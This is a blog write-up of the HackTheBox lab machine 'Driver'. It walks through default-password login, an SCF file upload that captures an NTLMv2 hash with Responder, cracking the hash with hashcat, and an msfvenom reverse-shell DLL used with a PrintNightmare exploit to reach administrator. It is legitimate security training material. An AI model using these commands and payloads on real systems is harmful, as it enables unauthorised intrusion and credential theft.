HTB: Driver

Posted on 27 Feb 2022 in security • 3 min read

Driver Card

This article is a writeup about a retired HacktheBox machine: Driver published on October 2, 2021 by MrR3boot. This box is rated as easy box the user part implies a "standard" password, a SCF file and Responder The root part is nudged by a few hints (box logo,printer on the foothold website) and implies the use of the CVE-2021-1675 and CVE-2021-34527 also know as PrintNightmare.



Let us start as always by a nmap scan. Only port 21 (FTP), 22 (SSH) and 80 with a HTTP service are open.

80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-10-21T22:20:07
|_  start_date: 2021-10-21T22:16:01


The website on port 80 ask for a basic authentication. is requesting your username and password. The site says: “MFP Firmware Update Center. Please enter password for admin”

We know that the user is admin and we try a few standard passwords: 'password' '123456' and 'admin'. The latest one is working.

The website is offering to test printer Firmware.

MFP Firmware Update Center

SCF file attack

As mentionned on the Firmware update page:

Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

As we know the testing team will review the file we can use a SCF file attack to grab the user NTLMv2 hash.

Our SCF file is the following:


The responder we launched before uploading our "firmware" file grab the tony user hash:

└─$ sudo responder -I tun0                                                                                                                                                                                                             130 ⨯
[SMB] NTLMv2-SSP Client   :
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:61dd54e51643d459:DFE0DC661F09DAFC004EC1844E9C4721:0101000000000000806B289471C6D7019A27EFE77C3A82220000000002000800350030004900410001001E00570049004E002D004A0053003900390048004F004D005800510052004A0004003400570049004E002D004A0053003900390048004F004D005800510052004A002E0035003000490041002E004C004F00430041004C000300140035003000490041002E004C004F00430041004C000500140035003000490041002E004C004F00430041004C0007000800806B289471C6D7010600040002000000080030003000000000000000000000000020000043273E6F56DF2738F8BCFF72F774D5270EEE087137EC21179464F2626C47E0800A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0035003500000000000000000000000000

Cracking hash

We run hashcat on it and grab tony's password: liltony.

└─$ hashcat hash -m 5600 -a 0 /home/kali/tools/password_lists/rockyou.txt --show TONY::DRIVER:61dd54e51643d459:dfe0dc661f09dafc004ec1844e9c4721:0101000000000000806b289471c6d7019a27efe77c3a82220000000002000800350030004900410001001e00570049004e002d004a0053003900390048004f004d005800510052004a0004003400570049004e002d004a0053003900390048004f004d005800510052004a002e0035003000490041002e004c004f00430041004c000300140035003000490041002e004c004f00430041004c000500140035003000490041002e004c004f00430041004c0007000800806b289471c6d7010600040002000000080030003000000000000000000000000020000043273e6f56df2738f8bcff72f774d5270eee087137ec21179464f2626c47e0800a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0035003500000000000000000000000000:liltony

Using evil winrm we can connect to the box using tony credentials and grab the user flag.

└─$ ./evil-winrm.rb -i -u tony -p liltony                                                                                                                                                                                 1 ⨯

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

[0;31;49m*Evil-WinRM*[0m[0;33;49m PS [0mC:\Users\tony\Documents> type ..\Desktop\user.txt


Looking at the running services we see that the Spooler service is running. (Back in October 2021, Print Nightmare was still the hypest vulnerability. Nobody had looked at the log4j code yet.)

[0;31;49m*Evil-WinRM*[0m[0;33;49m PS [0mC:\Users\tony\Documents> Get-Service -Name Spooler

Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

A few Google searches lead us to a working Print nightmare exploit.

We generate a reverse shell DLL using msfvenom msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST= LPORT=4444 -f dll -o /tmp/rev.dll

We upload it using evil winrm and grab the root flag.

*Evil-WinRM* PS C:\Users\tony\Documents> upload /tmp/rev.dll
Info: Uploading /tmp/rev.dll to C:\Users\tony\Documents\rev.dll

python3 tony:liltony@ -dll 'C:\Users\tony\Documents\rev.dll'

C:\Users\Administrator\Desktop>type root.txt
type root.txt

Wrapping up

The SCF file attack was great to exploit as this is not something I personally use a lot. The print nightmare was really interesting as this (was) is one of the biggest vulnerability of 2021.